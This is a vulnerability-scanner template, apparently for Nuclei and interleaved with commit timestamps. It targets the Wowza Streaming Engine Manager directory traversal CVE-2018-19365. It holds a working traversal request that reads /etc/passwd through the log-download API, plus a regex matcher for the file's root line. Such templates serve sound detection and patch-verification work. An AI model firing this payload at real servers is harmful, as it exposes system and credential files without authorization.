2022-02-28 13:13:59 +00:00
id : CVE-2018-19365
2022-04-21 21:16:41 +00:00
2022-02-28 13:13:59 +00:00
info :
2022-04-21 21:16:41 +00:00
name : Wowza Streaming Engine Manager 4.7.4.01 - Directory Traversal
2022-02-28 13:13:59 +00:00
author : 0x_Akoko
2023-01-21 16:19:45 +00:00
severity : critical
2022-04-21 21:16:41 +00:00
description : Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
2022-02-28 13:13:59 +00:00
reference :
- https://blog.gdssecurity.com/labs/2019/2/11/wowza-streaming-engine-manager-directory-traversal-and-local.html
2023-03-02 22:00:10 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-19365
2022-05-17 09:18:12 +00:00
- https://raw.githubusercontent.com/WowzaMediaSystems/public_cve/main/wowza-streaming-engine/CVE-2018-19365.txt
2022-02-28 13:13:59 +00:00
classification :
2023-01-21 16:19:45 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
cvss-score : 9.1
2022-02-28 13:13:59 +00:00
cve-id : CVE-2018-19365
cwe-id : CWE-22
tags : cve,cve2018,wowza,lfi
requests :
- method : GET
path :
2022-02-28 21:37:37 +00:00
- "{{BaseURL}}/enginemanager/server/logs/download?logType=error&logName=../../../../../../../../etc/passwd&logSource=engine"
2022-02-28 13:13:59 +00:00
matchers-condition : and
2022-02-28 21:37:37 +00:00
matchers :
- type : regex
2022-02-28 13:13:59 +00:00
part : body
2022-02-28 21:37:37 +00:00
regex :
- "root:.*:0:0:"
2022-02-28 13:13:59 +00:00
- type : status
status :
- 200
2022-04-21 21:16:41 +00:00
# Enhanced by mp on 2022/04/20